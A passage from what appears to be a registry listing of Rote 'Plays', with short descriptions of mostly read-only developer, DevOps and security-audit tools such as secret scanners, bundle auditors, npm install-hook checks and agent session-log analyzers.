fetches at runtime is reported as not measured rather than assumed absent. Images sized only by CSS or by JavaScript are reported as unattributable rather than guessed at. Font bytes are kept out of the blocking total and reported as an upper bound, because a stylesheet can reference twelve faces while a browser fetches the two it needs. The connection figures are named in the report as a stated model, never as a measurement of anyone's network. Run with no arguments and it weighs the most recently built page on this machine and names it; with nothing built anywhere, it weighs the bundled demo build and says so in its first line. Pointed at a source tree instead of a build, it refuses by name rather than inventing blockers a visitor would never meet. Read-only: it reads files, executes nothing, makes no network call and needs no credential.ROTE6 STEPSREAD ONLY4 ↓196React App AuditAudits a React or Next.js app in two passes: it reads your source for security problems, then it opens the build you actually ship and measures it. 24 kinds of finding across 6 parallel checks. SECURITY: 12 credential shapes (AWS, GitHub, Stripe, OpenAI, Anthropic, Google, Slack, SendGrid, JWT, private keys) matched against NEXT_PUBLIC_, VITE_ and REACT_APP_ variables and against hardcoded strings, plus 5 unsafe source patterns (dangerouslySetInnerHTML graded by where its data comes from, eval, new Function, innerHTML, document.write) and links opened with target _blank and no noopener. BUNDLE: gzipped JavaScript and CSS totals, the 10 largest chunks, first-load size per route against a budget you set, and which of your dependencies are present in the browser chunks, including 20 server SDKs such as Notion, Prisma, Stripe and AWS that should never be there. ALSO: pages and layouts marked use client, 11 heavy packages and 18 server-only packages imported client side, plain img tags, oversized images, and 7 build settings that skip TypeScript or ESLint or publish source maps. It refuses to give you a number it cannot stand behind: a development build, a stale build, or no build at all is reported as not measured rather than as fine. Package presence in chunks is an upper bound, not an exact cost, because chunks are shared, and first-load figures are summed from the route manifest so they can differ slightly from what next build prints. Secret values are matched by shape and never printed. Read only: it reads your files and changes nothing. Use it as a bundle size and performance check as well as a security scan: it reports first load JavaScript per route, finds the slow heavy chunks, and covers XSS risk and common React and Nextjs vulnerability patterns, environment variable and dotenv leaks, and image optimization. It deliberately does not flag the safe lookalikes: publishable keys, Google Analytics ids and Sentry DSNs behind a public prefix, a git SHA or SRI hash that looks like a secret, or dangerouslySetInnerHTML on a <style> tag or a static constant.ROTE8 STEPSREAD ONLY4 ↓197Minimum Working DemoFind a conservative rescue path from a local project’s current static evidence to one end-to-end demo journey. Read-only; never executes the project.ROTE12 STEPSREAD ONLY4 ↓198Screenshot To Bug BriefTurn a screenshot description and project context into a developer-ready bug brief. Read-only: no project code execution, writes, network calls, or secret values.ROTE9 STEPSREAD ONLY4 ↓199Frontend State PlannerPlan the complete UI state model for a feature: initial, loading, success, empty, validation failure, API failure, unauthorized, offline, and timeout. Read-only planning only; no network or code generation.ROTE9 STEPSREAD ONLY4 ↓200Demo Script BuilderBuild a timed hackathon demo sequence with problem opening, feature order, narration during waits, strongest moment, fallback, and closing.ROTE9 STEPSREAD ONLY4 ↓201Integration Readiness CheckCompare bounded static route signals from local frontend and backend directories before integration. Read-only; response behavior remains UNKNOWN unless evidenced.ROTE8 STEPSREAD ONLY4 ↓202Hackathon Scope CutterCut an ambitious hackathon idea into a demo-critical end-to-end slice, useful-if-time-remains work, cuts, dependencies, and an honest finish line.ROTE8 STEPSREAD ONLY4 ↓203Env SecurityEnvironment security auditor. Scans for .env drift, gitignore protection gaps, and hardcoded secrets. Returns a deterministic verdict (CLEAN / DRIFT / LEAK) with prioritized recommendations. Read-only, no credentials. ROTE4 STEPSREAD ONLY4 ↓204Fresh Clone ValidatorAudit whether a local repository appears ready for a brand-new developer to install, configure, run, and use. Read-only: never runs project code or reads secret values.ROTE10 STEPSREAD ONLY4 ↓205Error Context PackagerBuild a redacted debugging packet from a local project and an error message. Read-only: no code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY4 ↓206GroundhogGroundhog reads your local Claude Code, Codex, and Cursor session files on this machine and tells you which chores you keep paying to redo. It reads local history only, writes nothing unless you ask, and sends nothing — no network, no accounts, no keys. Needs only python3.ROTE10 STEPSREAD ONLY4 ↓207Viper Pit Env EncryptorSecurity & Governance Sentinel for viper-pit-env-encryptor: Scans authorization tokens, inspects protocol payloads, checks CORS policies, and mitigates OWASP Top 10 vulnerabilities.SESSIONS6 STEPSREAD ONLY4 ↓208Site Retake Smoke TesterDomain Analysis & Developer Utility for site-retake-smoke-tester: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY4 ↓209Pr Aura CheckDomain Analysis & Developer Utility for pr-aura-check: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY4 ↓210Leak Check FrSecurity & Governance Sentinel for leak-check-fr: Scans authorization tokens, inspects protocol payloads, checks CORS policies, and mitigates OWASP Top 10 vulnerabilities.SESSIONS6 STEPSREAD ONLY4 ↓211Lambda Deploy AuditorDevOps & Container Optimization Engine for lambda-deploy-auditor: Scans build artifacts, optimizes Dockerfile multi-stage layers, and automates CI/CD deployments.SESSIONS6 STEPSREAD ONLY4 ↓212Grace Point Rollback MedicDomain Analysis & Developer Utility for grace-point-rollback-medic: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY4 ↓213Git Pre Commit Hook InstallerDomain Analysis & Developer Utility for git-pre-commit-hook-installer: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY4 ↓214Erdtree S3 Micro DeployDevOps & Container Optimization Engine for erdtree-s3-micro-deploy: Scans build artifacts, optimizes Dockerfile multi-stage layers, and automates CI/CD deployments.SESSIONS6 STEPSREAD ONLY4 ↓215Pkg VetVet npm/PyPI/crates packages BEFORE installing. Checks OSV advisories, typosquat distance, package age, version count, maintainer signals, and license flags. Returns a deterministic verdict (SAFE / CAUTION / AVOID) with per-source evidence and a stage ledger. Read-only, no credentials. Complements (does not replace) installed-lockfile scanners such as modiqo/dependency-vulnerability-check. ROTE5 STEPSREAD ONLY4 ↓216Env Diff.env drift auditor. Scans for .env files and templates, compares keys, finds missing/extra keys, checks for potential secret leaks, and returns a deterministic verdict (CLEAN / DRIFT / LEAK). Read-only, no credentials. ROTE5 STEPSREAD ONLY4 ↓217Dep VetDependency health scanner. Finds lockfiles, parses dependencies, checks for outdated packages (npm registry), and scans for known vulnerabilities (OSV.dev). Returns a deterministic verdict (HEALTHY / STALE / VULNERABLE) with prioritized recommendations. Read-only, no credentials. ROTE5 STEPSREAD ONLY4 ↓218Readme HealthREADME completeness auditor. Scans for README files, checks standard section coverage (Installation, Usage, License, etc.), link quality, and code block formatting. Returns a deterministic verdict (HEALTHY / NEEDS_WORK / INCOMPLETE) with prioritized recommendations. Read-only, no credentials. ROTE5 STEPSREAD ONLY4 ↓219Github Repo Committer Issue CheckTop committers and issues opened in the last N days for a GitHub repositoryAPISESSIONSGITHUB4 STEPSREAD ONLY4 ↓220Agentic Rag EvaluatorEvaluates context relevance, faithfulness, and hallucination ratios for retrieval pipelines, generating an interactive HTML UI report.ROTE1 STEPSREAD ONLY4 ↓221Blast RadiusFinds the callers a refactor left behind. Compares a Python repository at two git revisions, collects every function, method and class whose signature changed or that disappeared, then resolves call sites across the whole tree. ORPHANED_CALL_SITE marks a call whose arity no longer fits the new signature. REMOVED_SYMBOL_STILL_CALLED marks a call to something that is gone at HEAD, including every symbol of a module the refactor deleted outright, which is the largest blast radius there is and the one a diff listing filenames alone cannot tell apart from a file it simply could not read. INDETERMINATE marks a call whose arity cannot be known statically, such as argument unpacking, and is never assumed correct. A symbol is only matched through an import that actually binds it, including relative imports, so an unrelated function of the same name in another module is never blamed. Files the refactor already touched are skipped. Names any path it could not read, and shows no findings when a step was blocked or truncated rather than passing a partial run off as a clean one. Pass root=demo base_ref=demo to compare the two bundled trees instead of two git revisions, so it can be tried with no repository and no setup. Never imports or executes the code: only ast.parse and git touch it. Zero credentials, python3 and git.ROTE2 STEPSREAD ONLY4 ↓222Play Change ReviewYou trusted one Play version. What changed in the next one? Compares two immutable releases of the same Play across inputs, declared access, runtime requirements, registry-visible execution structure and artifact identity without executing either reviewed Play.ROTE3 STEPSREAD ONLY4 ↓223Ts StrictnessReports what a TypeScript project's compiler settings actually enforce, and what they quietly let through. tsconfig.json is read as the JSONC it really is (comments and trailing commas make plain JSON parsing fail on a large share of real configs), every `extends` is resolved first (a relative file, a directory, or a package name found in node_modules), and `strict: true` is expanded into the flag family it implies, so noImplicitAny is never reported as missing when strict is on, while an explicit `"noImplicitAny": false` alongside `strict: true` is reported as the hole it is. Then it counts the escape hatches in your own source: `any` matched in type position only (never the substring in company, many or anyone, and never a cast quoted in a string or mentioned in a comment) plus @ts-ignore, @ts-expect-error, @ts-nocheck and eslint-disable directives with their file and line. An unresolvable `extends` is reported as undetermined rather than guessed. Read-only, entirely offline, no tsc invocation, no credentials.ROTE2 STEPSREAD ONLY4 ↓224Shell SafetyAudits shell scripts for the mistakes that make them silently do the wrong thing, with shell syntax actually parsed instead of grepped. Finds a missing set -euo pipefail, an unquoted expansion that word-splits a path, a recursive rm on a variable nothing proves is non-empty, a cd whose failure nobody checks, ls output being parsed, an unquoted variable inside [ ], and a pipeline whose exit status reports only its last command. It knows where quoting does not matter, so it does not invent findings: no report inside [[ ]] or (( )), none on x=$y, $#, $?, ${#x} or a word that already contains a deliberate glob, none for the pipefail that POSIX sh does not have, and none demanding set -e in a sourced library where it would change the caller's shell. #!/bin/bash -e counts as errexit, and a function that enables pipefail for one pipeline is judged at that line rather than at end of file. Read-only, never executes a script it audits.ROTE2 STEPSREAD ONLY4 ↓225Npm Scripts AuditAudits the npm code that runs without anyone reading it. Two halves, both fully offline: your own package.json scripts (a remote URL piped into a shell, a recursive delete whose target expands at run time or resolves outside the project, a write outside the project directory, a binary no declared dependency provides, npm publish with no prepublishOnly guard) and, the expensive half, every INSTALLED dependency that carries a preinstall, install or postinstall hook. Those hooks execute arbitrary code with your privileges on every npm install, so the play follows each hook command into the package files it actually runs and reports whether the code reaches the network, compiles locally, or does nothing, with the file and line as evidence. No registry call, no API key, no credentials.ROTE2 STEPSREAD ONLY4 ↓226Kubernetes GuardAudits Kubernetes manifests for the security and reliability gaps that only show up in production: containers with no resource limits or requests, missing or incomplete securityContext, privileged: true, added capabilities, hostPath/hostNetwork/hostPID, :latest or untagged images, missing liveness and readiness probes, and secrets passed as plain env values instead of a secretKeyRef. Structure is parsed rather than grepped, which is what makes it usable on real repositories. Helm templates are rendered against the chart's own values.yaml, so `resources: {{ toYaml .Values.resources | nindent 12 }}` is read as the limits values.yaml actually sets rather than reported as a missing limit; an action that cannot be resolved becomes an explicit unknown, never an absence. Every finding names its container, because in a multi-container pod the settings differ per container. Kubernetes' own securityContext inheritance is applied, so runAsNonRoot set on the pod counts for its containers while readOnlyRootFilesystem, which never inherits, does not. Probes are only expected where Kubernetes uses them: long-running workloads and native sidecars, not Jobs or init containers. Read-only, never contacts a cluster, needs no kubeconfig.ROTE2 STEPSREAD ONLY4 ↓227Command Shadow AuditWhen you type python3, what ACTUALLY runs -- and what did it silently replace? Five jobs, in order: statically parses a fixed list of shell rc files (~/.zshrc, ~/.zprofile, ~/.zshenv, ~/.bashrc, ~/.bash_profile, ~/.profile, ~/.bash_aliases -- plus whatever they literally `source` one level deep, tilde-expanded, cycle-safe, each file degrading independently) for alias, function, and PATH-export definitions, by reading their own text; walks THIS process's own $PATH, in order, for a watchlist of common commands (a built-in list plus anything you add), recording every hit -- directory, whether it is a symlink, its one-level link target, and which version-manager convention that directory matches (asdf, nvm, pyenv, rbenv, conda/anaconda, brew, ~/.local/bin, ~/.rote/bin, or plain system); joins the two and reports, per command, the winner using the shell's own precedence -- a function beats an alias beats the first PATH hit, stated explicitly because that is the one number this whole play hangs on -- and everything that decision silently shadows; optionally reads --version from every duplicate, but only for a small fixed allowlist of binaries (python3, python, node, git, curl, ruby, go, rustc, java), one 3-second-capped call each, never anything else and never through a shell; and grades each command's severity -- a function quietly standing in for a real binary is worst, a PATH duplicate carrying a different feature version is next, a same-version duplicate is just informational. Motivated by two real failure classes: a shell function silently shadowing curl and node once broke an entire plugin toolchain on a real machine, with nothing in the error output pointing at why; and on another machine, an older Anaconda python3 sat ahead of a newer Homebrew python3 on PATH -- one had Python's tomllib in its standard library and the other did not, so the exact same command ran a different program depending on shell state nobody had looked at. This play never executes your shell rc files and never opens an interactive shell -- every alias and function it reports comes from statically reading the rc files' own text, never from running them. Read-only, no credentials, no network; the only things this play ever executes are the fixed safe-allowlist version probes (python3/python/node/git/curl/ruby/go/rustc --version, java -version), each capped at 3 seconds, only when probe_versions=1; needs only python3.ROTE3 STEPSREAD ONLY4 ↓228Scheduled Job GraveyardReports the scheduled jobs on THIS machine you have probably forgotten exist: your user crontab (crontab -l), your ~/Library/LaunchAgents plists (parsed via plutil -convert json, degrading per-file on a bad plist), launchd own live status for those LaunchAgents (launchctl list -- pid and last-exit code), and -- names only, content never opened, no sudo -- /etc/crontab, /etc/cron.d, and the system LaunchDaemons directories: five sources in all. On Linux the same crontab is read and systemd user timers (systemctl --user list-timers, plus each activated units own ExecStart line) stand in for LaunchAgents; every source degrades on its own rather than failing the whole play, and an absent source (no crontab, no LaunchAgents dir) is reported as a plain, honest absence, never a warning. Each user-owned job is classified as healthy, target-missing (the first absolute-path token found in its command no longer exists on disk), stale-suspect (that target mtime is older than stale_days with no recent-run evidence -- a live pid, or a recently-touched stdout/stderr log -- mtime alone is circumstantial, never proof), silent-failure-suspect (launchd own last exit status for that job, via launchctl list, is nonzero -- including the exit-127 signature that on macOS often means TCC quietly denied the job folder access, a real, documented failure mode this play demonstrates live on its own machine), or opaque (its command could not be parsed at all, or carried no absolute path -- labeled, never guessed at). Target-extraction is deliberately simple and shell-aware: only the first absolute-path token in a command is ever tested (after stripping any leading VAR=value environment assignments, and never scanning ahead into a later argument or into a shell wrapper quoted string such as sh -c "..."), so an interpreter-wrapped job such as /bin/zsh script.sh is checked against the interpreter, not the script -- a disclosed blind spot, not a bug, and exactly why launchd own exit status is weighed ahead of target mtime in this play classification order. Every inferential label carries -suspect wording and its rule stated plainly, never a certainty, and a nonzero exit status is reported as literally "last exit N -- check it", never "broken" or "dead". Nothing here edits a crontab, rewrites a plist, or loads/unloads/signals any job; every remove-or-fix and TCC advisory is printed as text only, for you to act on yourself. Read-only, no sudo, no credentials, no network; needs only python3 (plutil is macOS-builtin and optional, degrading per-file and per-source when it or a plist is missing or unparseable).ROTE2 STEPSREAD ONLY4 ↓229Agent Disk TaxWhat does your agent tooling cost you in DISK, right now, by category, with the single largest offenders named? Five jobs, in order: discovers which of a fixed, well-known table of candidate roots exist on this machine -- Claude Code transcripts and non-transcript state, Codex, rote itself, playwright browser downloads, uv and npm/npx caches, ollama and lm-studio models, huggingface downloads, plus agent worktree directories -- never a filesystem walk to go looking for categories outside that table, with exactly one narrow, disclosed exception (a single non-recursive listing of ~/.claude itself, done once, to find worktree-named subdirectories); walks each included category's root(s) with a pure-python directory walk (os.scandir over an explicit stack, no `du` dependency -- this keeps every dependency at python3), checked against its deadline on every directory entry rather than once per directory, inside its own per-category time budget, so one huge category (a multi-gigabyte transcript history) can never block or starve another; counts total bytes and file count for that category while tracking its largest N files and its oldest and newest modification time; and, whenever that budget is hit before every root finishes walking, labels the category's figures PARTIAL and states plainly that the true size is AT LEAST what is shown -- never a silent truncation. A category root that is itself a symlink is never accepted as existing, and no two categories may claim overlapping roots -- both rejected before any root is ever walked, closing the one way this fixed table could otherwise be tricked into scanning outside its disclosed scope or double-counting a category. Regular-file hard links are deduplicated by inode within each category (content-addressable caches like uv/npm commonly hard-link the same blob under multiple names); the same file hard-linked into a DIFFERENT category is not deduplicated across that boundary, disclosed rather than silently left inflated. Every included category then lands in one table ranked by size, plus one merged "largest files" list across every category that is exact, not approximate (a file cannot be in the whole scan's top N without also being in its own category's top N, so merging each category's own top N and re-sorting is provably exact for any category that finished walking within its budget). The agent-worktrees category is reported differently, judgment-free: one row per worktree directory with its own size and last-modified time, and only a stated calendar fact ("untouched 14+ days") where the math says so -- never a recommendation to remove one, and this play removes nothing regardless. This is the disk half of our tax family: context-tax measures what your servers cost in tokens; this measures what your tooling costs in disk. Every path this play prints -- category roots, largest-file paths, worktree paths alike -- has the local home directory replaced with "~" before it reaches stdout, a report, or a fixture shipped with this play. Claude transcript file paths in the largest-files list default to filename only, since Claude Code's own transcript folder naming embeds the original project path; an opt-in parameter shows the full path. Sizes are POSIX apparent size (st_size), not on-disk block-allocated size, which is why this play makes no `du` calls of its own. Nothing is ever written, moved, or deleted by this play -- not even a cache file of its own -- and its own written advice never goes further than "review this yourself"; it prints no rm command, ever. Read-only, no network calls, no credentials read or transmitted; needs only python3.ROTE2 STEPSREAD ONLY4 ↓230Session DigestDigests your recent LOCAL agent session transcripts into "what happened while you were away" -- Claude Code transcripts under ~/.claude/projects, plus Codex transcripts under ~/.codex/sessions when present -- into counts only: sessions, duration, tool calls by tool, files edited/written, shell commands run, errors, and token usage totals where the transcript records them. One root step locates transcripts inside your look-back window and packs their paths; two parallel steps then stream each file line-by-line and aggregate -- Claude Code and Codex use different JSONL record shapes across their own versions, so each source gets its own defensive parser that treats an unrecognized record shape as uninformative rather than fatal, and degrades just that one file (never the whole run) on a genuine parse disaster. The presentation body joins both sources into one digest, degraded rows rendered honestly rather than hidden. The trust line is literal: message text, prompt content, and command argv are never read into the output -- shell commands run are a COUNT only, file paths are reported home-redacted, and nothing here is ever quoted back to you, only counted. Inspired by Anthropic's Apache-2.0-licensed receipts plugin; this is an independent implementation against the Python standard library, sharing no code with it. Read-only, no credentials, no network; needs only python3.ROTE3 STEPSREAD ONLY4 ↓231Safe To ShareChecks whether text is safe to paste into an issue, a chat, or an AI, and then prints the redacted version you can actually send. With no argument it checks your uncommitted git diff, which is what you are most likely about to share. Give it a file or a folder to check that instead. It looks for four kinds of leak: credentials (12 key shapes plus bearer and basic auth headers, cookies, passwords embedded in URLs, and API keys in query strings); other people's data (email addresses, phone numbers, and card numbers validated with Luhn so ordinary 16 digit ids are not reported); your internal network (private IP addresses, .internal and .corp hostnames, staging and QA URLs, and database connection strings); and your own identity (home directory paths that expose your username, your machine hostname, ssh and aws and kube config paths). It deliberately does not report things that only look alarming: a git SHA or an SRI hash is not a secret, 127.0.0.1 and 8.8.8.8 and 1.1.1.1 are not your infrastructure, and example.com and noreply addresses are not a person. Everything it flags, it also blanks in the redacted output, so the report and the safe copy never disagree. Secret values are shown only in redacted form. Read only, offline, no credentials: it reads what you point it at, writes nothing, and the redacted copy is printed rather than saved. Use it as a privacy and PII check before pasting: it finds personal data and credentials in logs, diffs and config, and gives you the redacted text back.ROTE7 STEPSREAD ONLY4 ↓232Env Drift SentinelEnvironment Variable Drift Sentinel and Secret Leak Auditor: scan a project for env-var usage, diff against .env docs, verify .gitignore safety and hardcoded secrets, emit a scored environment health scorecard.ROTE1 STEPSREAD ONLY4 ↓233Api Ssl Health ProberAPI and SSL Health Prober: read-only probe of HTTP/HTTPS endpoints grading PASS/WARN/FAIL for SSL cert expiry/days, HTTP latency, status + redirect chain, and HSTS/X-Content-Type-Options/CORS security headers.ROTE1 STEPSREAD ONLY4 ↓234Playoffs PulseLeaderboard for the Rote Playoffs hackathon.ROTE2 STEPSREAD ONLY4 ↓235Play VetTrust report for any rote Play before you run it. `rote play inspect` shows what a Play declares; play-vet reads the package source and shows what the code actually does - every network host, filesystem write, process spawn, and credential-named identifier - then cross-examines the declared contract against that evidence: read-only claims vs write calls, $params used but never declared (they pass through as silent literals), adapter endpoints missing from requires_endpoints, legacy bodies that dodge the step plane. Grades the effect surface S0-S3 and ends in a GREEN/YELLOW/RED verdict where every finding carries file:line evidence you can check in seconds. Static analysis of a locally pulled package: offline, read-only, no credentials, stdlib-Python only. It happily vets itself: play=mishraaditya/play-vet.ROTE4 STEPSREAD ONLY4 ↓236Gmail Subscription AuditScan Gmail receipts/renewal emails over a lookback window and produce a table of recurring subscriptions: vendor, amount, cadence, last charged, and unused-60+-days flag.APISESSIONSGMAIL-API5 STEPSREAD ONLY4 ↓237Coastal Fisher BeaconAutonomous marine weather advisory, high-swell warning beacon, and distress telemetry router for maritime authorities and fishing fleets.ROTE1 STEPSREAD ONLY4 ↓238ScamcheckScreen suspicious messages for common scam warning signals.ROTE1 STEPSREAD ONLY4 ↓239Hire Candidate With EvidenceBuild a public-GitHub-REST-API candidate evidence report for hiring evaluation across any target role or technology stack.APISESSIONSGITHUB6 STEPSREAD ONLY4 ↓240Pr Audit DraftRun a PR auditor, collect git metadata, and generate a polished PR description draft with audit report, security review, diff statistics, and test plan.ROTE5 STEPSREAD ONLY4 ↓241PlaybenchBenchmarks the same task with and without a pinned Rote Play using isolated workspaces, harness token telemetry, blind quality evaluation, and deterministic comparison gates.ROTE1 STEPSREAD ONLY4 ↓242Github Pr Merge ReadinessAssesses a GitHub pull request's CI, reviews, unresolved comments, mergeability, and changed-test coverage, then returns a READY or BLOCKED verdict.APISESSIONSGITHUB8 STEPSREAD ONLY4 ↓243Github Pr ReviewInteractive GitHub pull-request reviewer: a terminal menu (node:readline/promises) to view your own open PRs (approvals + CI check status) or triage incoming review-requested PRs (fetch diff, summarize, then approve or close). Legacy escape: the interactive menu and per-PR approve/close loop need PTY runtime interaction that the steps runner cannot express (its children receive closed stdin).APISESSIONSGITHUB0 STEPSREAD ONLY4 ↓244ShipcheckAudits a software repository and produces a concise, evidence-backed production-readiness report. It inspects repository structure, README and documentation, dependency/runtime requirements, environment/configuration requirements, authentication and security-sensitive implementation, tests and CI, and build/deployment configuration. It does not modify the repository. ROTE1 STEPSREAD ONLY4 ↓245Env DoctorIs your .env healthy? Checks key drift vs .env.example, scans for leaked secrets, validates KEY=VALUE format, and verifies optionalROTE4 STEPSREAD ONLY4 ↓246Site StatusChecks the live operational status of GitHub, npm, and Cloudflare using their public status JSON APIs. No authentication required. Read-only HTTP GETs only. ROTE1 STEPSREAD ONLY4 ↓247Kuwahara Dither ImageApplies Kuwahara-filter + ordered (Bayer) dithering to an image, following https://enochchau.com/blog/2022/kuwahara-dithering: downscale, Kuwahara filter, ordered dither + color quantization, nearest-neighbor upscale.ROTE2 STEPSREAD ONLY4 ↓248Audio Semantic ChaptersSplits any audio/video file into semantic chapters as tagged MP3s: transcribes with Whisper, has a model divide the transcript into at most max_chapters sections, snaps each boundary to a quiet point so transitions are smooth, then verifies every cut by re-transcribing the head of each chapter.ROTE8 STEPSREAD ONLY4 ↓249Hackernews Top Stories Local DigestReads the Hacker News front page in a headless browser, fetches each top story's article with curl, and produces per-story summaries plus a themes-of-the-day synthesis using a local LM Studio model. Client-rendered pages are reported as unfetchable rather than guessed at.APIBROWSERSHELLSESSIONSLMSTUDIO6 STEPSWRITES4 ↓250City Weather Day Night PrecipMulti-day weather forecast for any coordinate with precipitation split into day (06:00-20:59) and night (21:00-05:59) totals in mm, plus max/min temperature, precipitation probability and max wind.APISESSIONSOPEN-METEO1 STEPSREAD ONLY4 ↓251Wsl Toolchain DoctorAnswers one question on a WSL machine: which of the commands you type are not the program you think they are. Windows directories are appended to the Linux PATH by default and interop makes Windows executables reachable, so three unrelated failures look identical in a terminal and only one of them is shadowing. A command can resolve to an extensionless Windows shim and run as a Windows program with Windows path semantics, which is why docker with a bind mount hands a Windows client a Linux path it cannot see. A command can fail to resolve at all while its .exe sits on PATH, so the shell reports command not found about a tool that is plainly installed. Or it can be a symlink into /mnt/wsl left by a Docker Desktop style integration, which fills that path only while it is running: the directory listing shows the tool, running it finds nothing, and a Windows copy further down PATH silently takes over. Separating those three is the point, because the fix for each is different. It names the exact winning path and what it beat, then reports the configuration that caused it: appendWindowsPath, drive mounts without the metadata option so chmod appears to succeed and does nothing, case-insensitive mounts that collapse two tracked files into one, and whether your home and project sit on the slow 9p filesystem. It reports the PATH of the shell that invoked it and says so, because a diagnostic that hides its own scope is worth less than none. Read-only by construction: it parses configuration and stat data, tests case sensitivity by reading two spellings of a directory that already exists rather than writing probe files, repairs nothing, carries no credentials, and needs only python3. On a host that is not WSL it returns a single applicability verdict instead of inventing findings.ROTE4 STEPSREAD ONLY3 ↓252Deploy Reality CheckChecks that your deployed site really serves what your code says it should. It finds the pages your project declares (Next.js, SvelteKit, Astro, Nuxt, Remix or plain HTML), falls back to the live sitemap when there is no code to read, and opens every page on the live site. It loads the homepage and fetches every image, script and stylesheet the page asks for, which is how it catches files that work on your machine but 404 in production. It works out which stack the host is really running and tells you when the domain is serving a different project. It also checks the www and https redirects and the response headers. If you do not pass a URL it reads your project to find one and tests each candidate before picking. In a monorepo it points you at the app folder instead of checking the root. Read only: it makes GET requests and changes nothing. Useful as an uptime and broken link check after every release: it finds pages that are down or broken in production, images and assets that fail to load from your CDN, and reports the cache headers each response came back with. It reports the observation and the branch context rather than guessing a cause, so seven routes returning 404 on a domain serving a different framework is read as one wrong-site finding, not seven separate bugs.ROTE7 STEPSREAD ONLY3 ↓253Ssh Key AuditTells you which SSH and GPG keys on your machine you can delete, which are unprotected, and which are about to lock you out. It reads every key pair in your .ssh folder for its type, file permissions, and whether the private key has a passphrase. It reads your .ssh config to see which keys are actually used, lists GPG keys with the days left before they expire, checks the ssh-agent, and walks your local git clones to learn which SSH hosts you really push to. Then it reports keys nothing refers to, keys with no passphrase, key files other people can read, config entries pointing at a key that no longer exists, expired signing keys, and hosts you use with no key set up. Your key material is never read, parsed, or printed. Read only, no credentials, no network. Use it for key rotation planning: it tells you which keys are unused and safe to remove and which are close to expiry. A missing gpg, an empty ssh-agent, or a check it could not complete is reported as an explicit unknown, never as a pass, and your key material is never read, parsed or printed.ROTE7 STEPSREAD ONLY3 ↓254Git Commit And PushStages your changes, writes the commit message for you, and pushes. The message is written by an AI coding assistant you already have installed and signed in (claude, codex or gemini), so this play needs no API key of its own. Before it stages anything it looks at what you are about to commit and refuses if it finds a credential file, a file over the size limit, or a line that looks like a live secret such as a private key, cloud key, token or JWT. Use message= to write your own text and skip the AI. Use dry_run=true to see the commit message and the file list without committing or pushing. This play writes: it stages, commits, and pushes to your remote. It is a git push safety net: the guard runs before staging, so a dotenv file or an environment variable holding a live key never reaches your remote. The guard deliberately allows the safe cases: .env.example and .sample templates, and files whose only change is a deletion, are never blocked.ROTE8 STEPSREAD ONLY3 ↓255CompedEvery coding session on this machine wrote down exactly what it consumed, and none of it is readable by hand. This reads all of it: Claude Code including the subagent transcripts in subdirectories, where four in ten usage lines are streaming duplicates that must be collapsed before pricing, Codex, whose counters are cumulative and need differencing, and Pi. You get one card: the API list-price equivalent of the last N days per model, the multiplier against the plan you actually pay for, your cache-read share, and how all of it moved since your last run. Under it, the jobs you have asked your agent for three or more times, each with its repeat cost and the exact play settle command to capture it. Then what those repeats would have cost as Plays, at Modiqo's stated 98% and at a conservative 80%. Prices come from a bundled table that names its source and as-of date; a model the table does not know is reported as tokens and never priced by guess. You do not tell it what you run: the model ids in your own logs name the providers behind them -- Claude, GPT/Codex, Kimi, GLM, DeepSeek, Gemini, Grok, Qwen -- and every subscription those providers sell is priced on the card at once, the least flattering one marked as assumed, so you read your row instead of typing it. It refuses to open your OAuth files to find the tier, and the card says plainly that list price is not a bill. Read-only, no credentials, no network. Writes a Markdown report, an SVG card, a PNG when the machine can render one, and a small baseline for next run's delta, all under the folder you choose. Point claude_dir at resources/fixtures/claude to see a full run on synthetic logs before you run it on your own. - Reads: session logs under the four configured directories. Nothing else. - Never reads: `~/.claude.json`, `~/.codex/auth.json`, any credential, keychain or token file. Which AI you run is inferred from the model ids already in those logs; the plan tier is never read from your account. - Never sends: no network calls of any kind. Verifiable: the core imports no `urllib`, `http`, `socket`, `subprocess` (except the PNG renderer, which is invoked with a fixed argv and no shell). - Writes: only under `out_dir`. Every written path is listed in the report. - Message text: truncated to 120 chars and hashed by default. `redact=false` keeps full text locally, never in the card. See also: `session-ledger` (the normalized ledger this reads) and `wrong-turns` (recurring mistakes, with drafted rules). Docs, the full methodology and a worked example: https://gotcomped.comROTE8 STEPSREAD ONLY3 ↓256Hackathon Team SyncConvert rough team updates into status, blockers, dependencies, ownership needs, and critical path. Read-only: no project code execution, writes, network calls, or secret values.ROTE8 STEPSREAD ONLY3 ↓257Group Project Contribution MapMap local Git activity by area and overlap without treating commit counts as quality. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY3 ↓258Tarnished Auth WardenSecurity & Governance Sentinel for tarnished-auth-warden: Scans authorization tokens, inspects protocol payloads, checks CORS policies, and mitigates OWASP Top 10 vulnerabilities.SESSIONS6 STEPSREAD ONLY3 ↓259Shinobi Dead Route AssassinDomain Analysis & Developer Utility for shinobi-dead-route-assassin: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY3 ↓260Radiant Cors SentinelSecurity & Governance Sentinel for radiant-cors-sentinel: Scans authorization tokens, inspects protocol payloads, checks CORS policies, and mitigates OWASP Top 10 vulnerabilities.SESSIONS6 STEPSREAD ONLY3 ↓261Radahn Parallel Stress CannonHigh-Throughput Infrastructure & Scaling Engine for radahn-parallel-stress-cannon: Simulates extreme concurrent load, evaluates Redis token buckets, and benchmarks Kafka event streams.SESSIONS6 STEPSREAD ONLY3 ↓262Prisma Schema Migration WriterDevOps & Container Optimization Engine for prisma-schema-migration-writer: Scans build artifacts, optimizes Dockerfile multi-stage layers, and automates CI/CD deployments.SESSIONS6 STEPSREAD ONLY3 ↓263Port Ghost BusterDomain Analysis & Developer Utility for port-ghost-buster: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY3 ↓264Playoff Submission ValidatorDomain Analysis & Developer Utility for playoff-submission-validator: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY3 ↓265Play Plays Plays At PlayDomain Analysis & Developer Utility for play-plays-plays-at-play: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY3 ↓266Mikiri Rate Limiter GuardSecurity & Governance Sentinel for 